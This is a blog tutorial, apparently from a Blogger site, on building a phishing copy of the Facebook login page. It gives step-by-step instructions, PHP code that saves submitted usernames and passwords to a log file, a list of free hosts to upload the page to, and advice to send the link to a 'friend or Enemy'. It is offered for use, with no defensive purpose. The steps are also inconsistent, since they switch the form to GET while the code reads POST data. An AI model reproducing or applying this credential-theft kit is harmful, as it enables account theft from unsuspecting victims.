How to Create a Phishing Site

Now a days Phishing has become more popular may cyber crimes has been taking place.

Now in this we are to discuss How to make a Phishing site.

we need o open the facebook then Right Click on the page and then Select  View Source code.

Now a pop-up will be Displayed  as Below



Now copy the Source code and paste it in a text file and name it as Index.html.

Now open index.html in notepad or Any html editor like Notepad++

You can download Notepad++ form --- > Download Notepad++

Press CTRL + F in search Box type action= and press enter Now You see as

action="www.facebook.com______"

Now remove The Link in between the Quotes

and keep it as data.php

and Next to action= you find Method="POST"

Now change Method POST to GET and save the file

Now create a file name  data.php

Now place the following in the data.php file

<?php
header ('Location:Index.html');
$handle = fopen("fblogs.html", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;


then create a file named fblogs.html

Now the Phishing site is allmost completed just you need to upload these files to a web hosting site

you can use

110mb
000webhost
gigebox
50webs
biz.nf
zetahost
1freehosting
byehosting
5gbfree
freehosting
wix


Now you need to send the link to Your friend or Enemy Thats it.
For examle if you selected www.110mb.com as you web hosting
And named your sites gudinfo

Then the link will be www.gudinfo.110mb.com


You Can Download the phishing site code form the Link Below


Fb_Phishing.zip

Enjoy......!

How to Create a Phishing Site How to Create a Phishing Site Reviewed by TechBlogger on 02:00 Rating: 5
Powered by Blogger.